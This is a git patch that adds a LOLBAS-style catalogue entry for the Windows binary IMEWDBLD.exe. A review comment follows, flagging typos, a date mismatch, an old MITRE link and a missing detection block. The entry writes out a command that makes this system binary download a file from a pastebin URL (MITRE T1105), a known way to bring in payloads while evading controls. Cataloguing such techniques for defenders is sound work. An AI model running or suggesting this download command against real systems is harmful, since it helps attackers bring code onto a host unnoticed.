From 782bc68c7cb77073caf2fb0817fad31461cf9597 Mon Sep 17 00:00:00 2001 From: whickey-r7 <32334421+whickey-r7@users.noreply.github.com> Date: Fri, 5 Mar 2021 11:35:06 -0500 Subject: [PATCH] Create IMEWDBLD.yml --- yml/OSBinaries/IMEWDBLD.yml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 yml/OSBinaries/IMEWDBLD.yml diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml new file mode 100644 index 0000000..e1167c1 --- /dev/null +++ b/yml/OSBinaries/IMEWDBLD.yml @@ -0,0 +1,22 @@ +--- +Name: IMEWDBLD.exe +Description: Microsoft IME Open Extended Dictionary Module +Author: 'Wade Hickey' +Created: '2020-03-05' +Commands: + - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw + Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe +Resources: + - Link: https://twitter.com/notwhickey/status/1367493406835040265 +Acknowledgement: + - Person: Wade Hickey + Handle: '@notwhickey' +---
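Review bot: In the `Description` under `Commands`, both cache paths end in `<8_RANDOM_ALNUM_CHARS>/[1].`, which switches to `/` after the `\` separators used in the rest of the path and leaves the file name and extension around `[1].` empty. Spell out that placeholder so a responder knows which file to look for under INetCache. The same sentence says "served at by that URL", which should read "served at that URL", and would be clearer split in two after "dictionary file". `Created: '2020-03-05'` does not match the commit date of 5 Mar 2021 in the patch header, so the year looks like a typo. `MitreLink` uses the old `attack.mitre.org/wiki/Technique/T1105` path; the current form is `https://attack.mitre.org/techniques/T1105/`. The entry also has no `Detection` block; an IOC such as IMEWDBLD.exe started with a URL on its command line, or making outbound network connections, would give defenders something to alert on.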